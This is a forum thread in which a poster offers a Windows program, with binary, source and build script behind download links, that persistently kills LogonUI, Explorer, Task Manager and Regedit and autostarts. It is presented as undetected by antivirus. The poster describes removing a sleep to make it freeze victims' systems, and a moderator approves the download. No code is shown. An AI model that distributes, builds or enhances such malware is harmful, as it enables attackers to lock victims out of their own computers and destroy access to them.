Thread Rating:
  • 4 Vote(s) - 2.5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
persistent killer of LogonUI, explorer, taskmgr, regedit; autostarts
#1
Edit: removed password and updated link and virustotal

Archive with binary, source and build script:
------------------
Virustotal: 0/57
https://www.virustotal.com/en/file/6fe6a...427236294/

https://mega.co.nz/#!bt01EDaY!RKJum3lgQT...xtqJrYy8bk

Source included in archive. Included binary is compiled by GCC 4.9.2 (rev 5, MSYS2) with statically linked libstdc++ and mingw runtime.
I am not sure if this can be compiled by MSVC, I'll test later, but MinGW is easy to use and get, so it is not really a problem.

List of files:
main.cpp - source
build.bat - one line script that calls compiler with recommended set of arguments
streamopt.exe - compiled binary

Source only:
------------
https://www.virustotal.com/en/file/dfdde...427236863/

https://mega.co.nz/#!m1kiiZbC!N1ED9lmjPh...ENsb31dd3U

Aditional info:
by removing sleep from killer thread, this can be transformed into wrecker - it freezes system. After restart and new login, only black screen is shown. Sleep is added by default to allow further communication with victim.
Reply
#2
Download removed not the same file as virus scan
Reply
#3
(03-24-2015, 09:29 PM)ŜǗϻϻĮŤ Wrote:  Download removed not the same file as virus scan
Aha. I have virusscanned only the exe itself (exe was in archive and it was only thing that could cause any harm). I have visrustotalled whole archive and added download for source code only.
Reply
#4
Approved This is safe to download
Reply
 




Users browsing this thread: 1 Guest(s)